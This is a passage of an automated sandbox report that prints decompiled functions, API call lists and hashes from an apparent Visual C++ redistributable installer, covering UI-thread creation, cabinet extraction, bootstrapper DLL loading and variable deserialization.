					E000137D3(0x80004005, "uithread.cpp", 0x33, _t45);
					_push("Failed to create initialization event.");
					L2:
					_push(_t45);
					E0005012F();
					_t28 = _v8;
				}
				if(_t28 != 0) {
					CloseHandle(_t28);
					_v8 = 0;
				}
				if(_v12 != 0) {
					CloseHandle(_v12);
				}
				return _t45;
			}













                                                                          0x0002e83a
                                                                          0x0002e83d
                                                                          0x0002e83e
                                                                          0x0002e844
                                                                          0x0002e846
                                                                          0x0002e849
                                                                          0x0002e84a
                                                                          0x0002e850
                                                                          0x0002e855
                                                                          0x0002e894
                                                                          0x0002e898
                                                                          0x0002e89f
                                                                          0x0002e8ad
                                                                          0x0002e8b0
                                                                          0x0002e8b6
                                                                          0x0002e8bb
                                                                          0x0002e8f8
                                                                          0x0002e901
                                                                          0x0002e907
                                                                          0x0002e909
                                                                          0x0002e8bd
                                                                          0x0002e8ce
                                                                          0x0002e8d8
                                                                          0x0002e8e3
                                                                          0x0002e8e8
                                                                          0x00000000
                                                                          0x0002e8e8
                                                                          0x0002e857
                                                                          0x0002e868
                                                                          0x0002e872
                                                                          0x0002e87d
                                                                          0x0002e882
                                                                          0x0002e887
                                                                          0x0002e887
                                                                          0x0002e888
                                                                          0x0002e88d
                                                                          0x0002e891
                                                                          0x0002e914
                                                                          0x0002e917
                                                                          0x0002e919
                                                                          0x0002e919
                                                                          0x0002e91f
                                                                          0x0002e924
                                                                          0x0002e924
                                                                          0x0002e92e

                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00015386,?,?), ref: 0002E84A
                                                                          • GetLastError.KERNEL32(?,00015386,?,?), ref: 0002E857
                                                                          • CreateThread.KERNEL32 ref: 0002E8B0
                                                                          • GetLastError.KERNEL32(?,00015386,?,?), ref: 0002E8BD
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00015386,?,?), ref: 0002E8F8
                                                                          • CloseHandle.KERNEL32(00000000,?,00015386,?,?), ref: 0002E917
                                                                          • CloseHandle.KERNEL32(?,?,00015386,?,?), ref: 0002E924
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                          • String ID: @Met$Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                          • API String ID: 2351989216-3967303901
                                                                          • Opcode ID: 2a6c360c8f84a1b3936b61b1c9f551ab185ed4282aceb130dc1b4a2a94fd1ede
                                                                          • Instruction ID: b5b56d7acec5ac3f54ec343228da25e6a3df9ac5041814cdbf4cb93143c83bdf
                                                                          • Opcode Fuzzy Hash: 2a6c360c8f84a1b3936b61b1c9f551ab185ed4282aceb130dc1b4a2a94fd1ede
                                                                          • Instruction Fuzzy Hash: 92311475E40319BFEB509FA9DD85AAFB6ECEF08351F114126F905E7191D6309E008AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002E3F4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 95threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 57%
                                                                          			E0002E3F4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				void* _t23;
				void* _t29;
				int _t31;
				void* _t47;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t23 = CreateEventW(0, 1, 0, 0);
				_v16 = _t23;
				if(_t23 != 0) {
					_v32 = _t23;
					_v28 = _a4;
					_v24 = _a8;
					_v20 = _a12;
					_t29 = CreateThread(0, 0, E0002E177,  &_v32, 0,  &_v8);
					_v12 = _t29;
					if(_t29 != 0) {
						_t31 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
					} else {
						_t46 =  <=  ? GetLastError() : _t33 & 0x0000ffff | 0x80070000;
						_t47 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t33 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "splashscreen.cpp", 0x42, _t47);
						_push("Failed to create UI thread.");
						goto L2;
					}
				} else {
					_t50 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					_t47 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "splashscreen.cpp", 0x39, _t47);
					_push("Failed to create modal event.");
					L2:
					_push(_t47);
					_t31 = E0005012F();
				}
				if(_v12 != 0) {
					_t31 = CloseHandle(_v12);
					_v12 = 0;
				}
				if(_v16 != 0) {
					return CloseHandle(_v16);
				}
				return _t31;
			}














                                                                          0x0002e401
                                                                          0x0002e402
                                                                          0x0002e403
                                                                          0x0002e404
                                                                          0x0002e40c
                                                                          0x0002e40f
                                                                          0x0002e412
                                                                          0x0002e415
                                                                          0x0002e41b
                                                                          0x0002e420
                                                                          0x0002e45c
                                                                          0x0002e462
                                                                          0x0002e468
                                                                          0x0002e46e
                                                                          0x0002e481
                                                                          0x0002e487
                                                                          0x0002e48c
                                                                          0x0002e4c9
                                                                          0x0002e48e
                                                                          0x0002e49f
                                                                          0x0002e4a9
                                                                          0x0002e4b4
                                                                          0x0002e4b9
                                                                          0x00000000
                                                                          0x0002e4b9
                                                                          0x0002e422
                                                                          0x0002e433
                                                                          0x0002e43d
                                                                          0x0002e448
                                                                          0x0002e44d
                                                                          0x0002e452
                                                                          0x0002e452
                                                                          0x0002e453
                                                                          0x0002e459
                                                                          0x0002e4d8
                                                                          0x0002e4dd
                                                                          0x0002e4df
                                                                          0x0002e4df
                                                                          0x0002e4e5
                                                                          0x00000000
                                                                          0x0002e4ea
                                                                          0x0002e4f1

                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,00015386,?,?), ref: 0002E415
                                                                          • GetLastError.KERNEL32(?,?,00015386,?,?), ref: 0002E422
                                                                          • CreateThread.KERNEL32 ref: 0002E481
                                                                          • GetLastError.KERNEL32(?,?,00015386,?,?), ref: 0002E48E
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00015386,?,?), ref: 0002E4C9
                                                                          • CloseHandle.KERNEL32(?,?,?,00015386,?,?), ref: 0002E4DD
                                                                          • CloseHandle.KERNEL32(?,?,?,00015386,?,?), ref: 0002E4EA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                          • String ID: @Met$Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                          • API String ID: 2351989216-2754267361
                                                                          • Opcode ID: f35092fface93e35c3bbe46cc9fe621a14e8164a6a97199cc7c60242abe85c29
                                                                          • Instruction ID: 6b07b3be2a60fe5275d62510ee9e71c094c876dba5f6a7e36982474861261156
                                                                          • Opcode Fuzzy Hash: f35092fface93e35c3bbe46cc9fe621a14e8164a6a97199cc7c60242abe85c29
                                                                          • Instruction Fuzzy Hash: A7318F75D40329BBEB21AFA9DC05AAFBBF8EF44711F10812AFD15E7190D7345A008AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00031224 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 88threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 55%
                                                                          			E00031224(intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t20;
				intOrPtr _t50;

				_t50 = _a4;
				_v16 =  *(_t50 + 0x28);
				_v12 =  *(_t50 + 0x20);
				_v8 = 0;
				_t20 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
				if(_t20 == 0) {
					if(ResetEvent( *(_t50 + 0x28)) != 0) {
						 *((intOrPtr*)(_t50 + 0x2c)) = 0;
					} else {
						_t37 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						_t38 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cabextract.cpp", 0x13e, _t38);
						_push("Failed to reset operation complete event.");
						goto L7;
					}
				} else {
					if(_t20 == 1) {
						if(GetExitCodeThread( *(_t50 + 0x20),  &_v8) == 0) {
							_t43 =  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
							_t44 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
							_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "cabextract.cpp", 0x145, _t44);
							_push("Failed to get extraction thread exit code.");
							goto L7;
						}
					} else {
						_t47 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						_t48 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cabextract.cpp", 0x14b, _t48);
						_push("Failed to wait for operation complete event.");
						L7:
						_push(_v8);
						E0005012F();
					}
				}
				return _v8;
			}








                                                                          0x0003122b
                                                                          0x00031236
                                                                          0x0003123c
                                                                          0x00031246
                                                                          0x00031249
                                                                          0x00031251
                                                                          0x000312ef
                                                                          0x00031333
                                                                          0x000312f1
                                                                          0x00031302
                                                                          0x0003130c
                                                                          0x0003131a
                                                                          0x0003131d
                                                                          0x00031322
                                                                          0x00000000
                                                                          0x00031322
                                                                          0x00031257
                                                                          0x0003125a
                                                                          0x000312a6
                                                                          0x000312bd
                                                                          0x000312c7
                                                                          0x000312d5
                                                                          0x000312d8
                                                                          0x000312dd
                                                                          0x00000000
                                                                          0x000312dd
                                                                          0x0003125c
                                                                          0x0003126d
                                                                          0x00031277
                                                                          0x00031285
                                                                          0x00031288
                                                                          0x0003128d
                                                                          0x00031327
                                                                          0x00031327
                                                                          0x0003132a
                                                                          0x00031330
                                                                          0x0003125a
                                                                          0x0003133e

                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,746AF5E0,?,?,000152FD,000152B5,00000000,0001533D), ref: 00031249
                                                                          • GetLastError.KERNEL32 ref: 0003125C
                                                                          • GetExitCodeThread.KERNEL32(0005B478,?), ref: 0003129E
                                                                          • GetLastError.KERNEL32 ref: 000312AC
                                                                          • ResetEvent.KERNEL32(0005B450), ref: 000312E7
                                                                          • GetLastError.KERNEL32 ref: 000312F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                          • String ID: @Met$Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                          • API String ID: 2979751695-2925335154
                                                                          • Opcode ID: 96e1dad35e4fff5a640c4c10a1aeeaefbc0de680c30eb96f5cf9240a048b12c1
                                                                          • Instruction ID: 0281abe507f24b18721e2a4d911457e0cd3d32bb58a0c35fb68f9b5de862babd
                                                                          • Opcode Fuzzy Hash: 96e1dad35e4fff5a640c4c10a1aeeaefbc0de680c30eb96f5cf9240a048b12c1
                                                                          • Instruction Fuzzy Hash: F721C175740304AFEB14AB798D06AFF76F8EF09711F10452EF946E61E0E734DA009A25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00031341 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 80synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
                                                                          			E00031341(void* __ebx, intOrPtr _a4) {
				signed short _t30;
				signed short _t34;
				void* _t37;
				void* _t42;
				intOrPtr _t49;

				_t37 = __ebx;
				_t49 = _a4;
				_t42 = 0;
				if( *(_t49 + 0x20) != 0) {
					_t3 = _t49 + 0x24; // 0x685479f6
					 *((intOrPtr*)(_t49 + 0x2c)) = 5;
					if(SetEvent( *_t3) != 0) {
						_t5 = _t49 + 0x20; // 0x85f08bff
						if(WaitForSingleObject( *_t5, 0xffffffff) != 0) {
							_t30 = GetLastError();
							_t45 =  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
							_t42 =  >=  ? 0x80004005 :  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "cabextract.cpp", 0x10b, _t42);
							_push("Failed to wait for thread to terminate.");
							goto L5;
						}
					} else {
						_t34 = GetLastError();
						_t48 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						_t42 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cabextract.cpp", 0x105, _t42);
						_push("Failed to set begin operation event.");
						L5:
						_push(_t42);
						E0005012F();
					}
				}
				_push(_t37);
				if( *(_t49 + 0x20) != 0) {
					_t7 = _t49 + 0x20; // 0x85f08bff
					CloseHandle( *_t7);
					 *(_t49 + 0x20) =  *(_t49 + 0x20) & 0x00000000;
				}
				if( *(_t49 + 0x24) != 0) {
					_t11 = _t49 + 0x24; // 0x685479f6
					CloseHandle( *_t11);
					 *(_t49 + 0x24) =  *(_t49 + 0x24) & 0x00000000;
				}
				if( *(_t49 + 0x28) != 0) {
					_t15 = _t49 + 0x28; // 0x5ba60
					CloseHandle( *_t15);
					 *(_t49 + 0x28) =  *(_t49 + 0x28) & 0x00000000;
				}
				if( *((intOrPtr*)(_t49 + 0x4c)) != 0) {
					_t19 = _t49 + 0x4c; // 0x682c79f6
					E00013999( *_t19);
				}
				if( *((intOrPtr*)(_t49 + 0x1c)) != 0) {
					_t21 = _t49 + 0x1c; // 0xfff48be8
					E000554EF( *_t21);
				}
				return _t42;
			}








                                                                          0x00031341
                                                                          0x00031345
                                                                          0x00031349
                                                                          0x0003134e
                                                                          0x00031354
                                                                          0x00031357
                                                                          0x00031366
                                                                          0x0003139f
                                                                          0x000313aa
                                                                          0x000313ac
                                                                          0x000313bd
                                                                          0x000313c7
                                                                          0x000313d5
                                                                          0x000313da
                                                                          0x00000000
                                                                          0x000313da
                                                                          0x00031368
                                                                          0x00031368
                                                                          0x00031379
                                                                          0x00031383
                                                                          0x00031391
                                                                          0x00031396
                                                                          0x000313df
                                                                          0x000313df
                                                                          0x000313e0
                                                                          0x000313e6
                                                                          0x00031366
                                                                          0x000313eb
                                                                          0x000313f2
                                                                          0x000313f4
                                                                          0x000313f7
                                                                          0x000313f9
                                                                          0x000313f9
                                                                          0x00031401
                                                                          0x00031403
                                                                          0x00031406
                                                                          0x00031408
                                                                          0x00031408
                                                                          0x00031410
                                                                          0x00031412
                                                                          0x00031415
                                                                          0x00031417
                                                                          0x00031417
                                                                          0x00031420
                                                                          0x00031422
                                                                          0x00031425
                                                                          0x00031425
                                                                          0x0003142e
                                                                          0x00031430
                                                                          0x00031433
                                                                          0x00031433
                                                                          0x0003143d

                                                                          APIs
                                                                          • SetEvent.KERNEL32(685479F6,0001533D,00000000,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000,?), ref: 0003135E
                                                                          • GetLastError.KERNEL32(?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000,?,00015381,FFF9E89D,00015381), ref: 00031368
                                                                          • WaitForSingleObject.KERNEL32(85F08BFF,000000FF,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000,?,00015381), ref: 000313A2
                                                                          • GetLastError.KERNEL32(?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000,?,00015381,FFF9E89D,00015381), ref: 000313AC
                                                                          • CloseHandle.KERNEL32(85F08BFF,00015381,0001533D,00000000,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000), ref: 000313F7
                                                                          • CloseHandle.KERNEL32(685479F6,00015381,0001533D,00000000,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000), ref: 00031406
                                                                          • CloseHandle.KERNEL32(0005BA60,00015381,0001533D,00000000,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000), ref: 00031415
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                          • String ID: @Met$Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                          • API String ID: 1206859064-254475197
                                                                          • Opcode ID: dcce1d7c49e4888c4e3ea2853ded4bc351791e18bfc34e4f6b8c54d788bdc60a
                                                                          • Instruction ID: dd3133e8c1b64a0757859499d016c2861bc1f44926d33d696df9ec81e8bbf66f
                                                                          • Opcode Fuzzy Hash: dcce1d7c49e4888c4e3ea2853ded4bc351791e18bfc34e4f6b8c54d788bdc60a
                                                                          • Instruction Fuzzy Hash: 6821C732200700DFE7326B26DC45BA776FAFF88712F01062DE54A919E0DB79E441DE25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001D5C0 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 61libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 18%
                                                                          			E0001D5C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HINSTANCE__* _t9;
				signed short _t15;
				signed short _t18;
				intOrPtr* _t21;
				intOrPtr _t24;
				void* _t25;

				_t24 = _a4;
				_t2 = _t24 + 4; // 0x69006e
				_t9 = LoadLibraryW( *( *_t2 + 0x50));
				 *(_t24 + 0xc) = _t9;
				if(_t9 != 0) {
					_t21 = GetProcAddress(_t9, "BootstrapperApplicationCreate");
					if(_t21 != 0) {
						_t5 = _t24 + 0x10; // 0x5b4a0
						_t25 =  *_t21(_a8, _a12, _t5);
						if(_t25 < 0) {
							_push("Failed to create UX.");
							goto L6;
						}
					} else {
						_t15 = GetLastError();
						_t28 =  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
						_t25 =  >=  ? 0x80004005 :  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "userexperience.cpp", 0x5d, _t25);
						_push("Failed to get BootstrapperApplicationCreate entry-point");
						goto L6;
					}
				} else {
					_t18 = GetLastError();
					_t31 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
					_t25 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "userexperience.cpp", 0x59, _t25);
					_push("Failed to load UX DLL.");
					L6:
					_push(_t25);
					E0005012F();
				}
				return _t25;
			}









                                                                          0x0001d5c4
                                                                          0x0001d5c7
                                                                          0x0001d5cd
                                                                          0x0001d5d3
                                                                          0x0001d5d8
                                                                          0x0001d618
                                                                          0x0001d61c
                                                                          0x0001d650
                                                                          0x0001d65c
                                                                          0x0001d660
                                                                          0x0001d662
                                                                          0x00000000
                                                                          0x0001d662
                                                                          0x0001d61e
                                                                          0x0001d61e
                                                                          0x0001d62f
                                                                          0x0001d639
                                                                          0x0001d644
                                                                          0x0001d649
                                                                          0x00000000
                                                                          0x0001d649
                                                                          0x0001d5da
                                                                          0x0001d5da
                                                                          0x0001d5eb
                                                                          0x0001d5f5
                                                                          0x0001d600
                                                                          0x0001d605
                                                                          0x0001d667
                                                                          0x0001d667
                                                                          0x0001d668
                                                                          0x0001d66e
                                                                          0x0001d673

                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(?,00000000,?,000146F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00015386,?,?), ref: 0001D5CD
                                                                          • GetLastError.KERNEL32(?,000146F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00015386,?,?), ref: 0001D5DA
                                                                          • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0001D612
                                                                          • GetLastError.KERNEL32(?,000146F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00015386,?,?), ref: 0001D61E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                          • String ID: @Met$BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp$wininet.dll
                                                                          • API String ID: 1866314245-3673390192
                                                                          • Opcode ID: ddc07bab9240b03ba2f221fd501932b6581cd6bb70443fdf56bdbe4c3c04a58f
                                                                          • Instruction ID: 3f77daa50eb16e12360e6b04ed3d23604385354c1dfcdc507e4131e985c68076
                                                                          • Opcode Fuzzy Hash: ddc07bab9240b03ba2f221fd501932b6581cd6bb70443fdf56bdbe4c3c04a58f
                                                                          • Instruction Fuzzy Hash: 6311E932A40732ABEB215A699C05FBB36D4DF04752F01413AFE09E75D0EB29DC408BD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00016E5A Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E00016E5A(void* __eflags, struct _CRITICAL_SECTION* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
				int _v8;
				char _v12;
				void* _v16;
				void* _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				void* _v40;
				void _v56;
				char* _t67;
				signed int _t75;
				int _t81;
				int _t91;
				char* _t96;
				int _t97;
				char* _t108;
				signed int _t110;
				void* _t112;
				int _t115;
				int _t116;
				int _t121;
				void* _t124;

				_t124 = __eflags;
				_t110 = 6;
				_v16 = 0;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				memset( &_v56, 0, _t110 << 2);
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				asm("movlpd [ebp-0x1c], xmm0");
				EnterCriticalSection(_a4);
				_t120 = _a20;
				_t109 = _a16;
				_t121 = E0004F534(0, _t124, _a12, _a16, _a20,  &_v16);
				if(_t121 >= 0) {
					_a20 = _a20 & 0x00000000;
					__eflags = _v16;
					if(__eflags <= 0) {
						L39:
						LeaveCriticalSection(_a4);
						if(_v12 != 0) {
							E000554EF(_v12);
						}
						E00030499( &_v56);
						_t67 =  &_v32;
						_t112 = 8;
						do {
							 *_t67 = 0;
							_t67 = _t67 + 1;
							_t112 = _t112 - 1;
						} while (_t112 != 0);
						E00012793(_v8);
						return _t121;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t121 = E0004F534(0, __eflags, _a12, _t109, _t120,  &_v20);
						__eflags = _t121;
						if(_t121 < 0) {
							break;
						}
						__eflags = _v20;
						if(__eflags == 0) {
							L27:
							_t75 = _a20 + 1;
							_a20 = _t75;
							__eflags = _t75 - _v16;
							if(__eflags < 0) {
								continue;
							}
							goto L39;
						}
						_t121 = E0004F58F(0, __eflags, _a12, _t109, _t120,  &_v12);
						__eflags = _t121;
						if(__eflags < 0) {
							_push("Failed to read variable name.");
							L38:
							_push(_t121);
							E0005012F();
							goto L39;
						}
						_t121 = E0004F534(0, __eflags, _a12, _t109, _t120,  &_v40);
						__eflags = _t121;
						if(_t121 < 0) {
							_push("Failed to read variable value type.");
							goto L38;
						}
						_t81 = _v40;
						__eflags = _t81;
						if(__eflags == 0) {
							L24:
							_t121 = E0004F534(0, __eflags, _a12, _t109, _t120,  &_v24);
							__eflags = _t121;
							if(_t121 < 0) {
								_push("Failed to read variable literal flag.");
								goto L38;
							}
							asm("sbb eax, eax");
							_t121 = E00016C5D(0, _a4, _v12,  &_v56, _v24,  ~_a8 + 3, 0);
							__eflags = _t121;
							if(_t121 < 0) {
								_push("Failed to set variable.");
								goto L38;
							}
							E00030499( &_v56);
							goto L27;
						}
						_t91 = _t81 - 1;
						__eflags = _t91;
						if(__eflags == 0) {
							_t121 = E0004F4D2(0, __eflags, _a12, _t109, _t120,  &_v32);
							__eflags = _t121;
							if(_t121 < 0) {
								L30:
								_push("Failed to read variable value as number.");
								goto L38;
							}
							_t121 = E000302B0( &_v56, _v32, _v28);
							__eflags = _t121;
							if(_t121 < 0) {
								L29:
								_push("Failed to set variable value.");
								goto L38;
							}
							_t115 = 8;
							_t96 =  &_v32;
							do {
								 *_t96 = 0;
								_t96 = _t96 + 1;
								_t115 = _t115 - 1;
								__eflags = _t115;
							} while (__eflags != 0);
							goto L24;
						}
						_t97 = _t91 - 1;
						__eflags = _t97;
						if(__eflags == 0) {
							_t121 = E0004F58F(0, __eflags, _a12, _t109, _t120,  &_v8);
							__eflags = _t121;
							if(_t121 < 0) {
								_push("Failed to read variable value as string.");
								goto L38;
							}
							_t121 = E000302F4( &_v56, _v8, 0);
							__eflags = _t121;
							if(_t121 < 0) {
								goto L29;
							}
							__eflags = _v8;
							if(__eflags != 0) {
								E00012793(_v8);
								_v8 = _v8 & 0x00000000;
							}
							goto L24;
						}
						__eflags = _t97 - 1;
						if(__eflags != 0) {
							_t121 = 0x80070057;
							_push("Unsupported variable type.");
							goto L38;
						}
						_t121 = E0004F4D2(0, __eflags, _a12, _t109, _t120,  &_v32);
						__eflags = _t121;
						if(_t121 < 0) {
							goto L30;
						}
						_t121 = E00030455( &_v56, _v32, _v28);
						__eflags = _t121;
						if(_t121 < 0) {
							goto L29;
						}
						_t116 = 8;
						_t108 =  &_v32;
						do {
							 *_t108 = 0;
							_t108 = _t108 + 1;
							_t116 = _t116 - 1;
							__eflags = _t116;
						} while (__eflags != 0);
						goto L24;
					}
					_push("Failed to read variable included flag.");
					goto L38;
				}
				_push("Failed to read variable count.");
				goto L38;
			}

























                                                                          0x00016e5a
                                                                          0x00016e6a
                                                                          0x00016e70
                                                                          0x00016e73
                                                                          0x00016e76
                                                                          0x00016e79
                                                                          0x00016e7b
                                                                          0x00016e7e
                                                                          0x00016e81
                                                                          0x00016e84
                                                                          0x00016e89
                                                                          0x00016e8f
                                                                          0x00016e95
                                                                          0x00016ea3
                                                                          0x00016ea7
                                                                          0x00016eb3
                                                                          0x00016eb7
                                                                          0x00016ebb
                                                                          0x00017092
                                                                          0x00017095
                                                                          0x0001709f
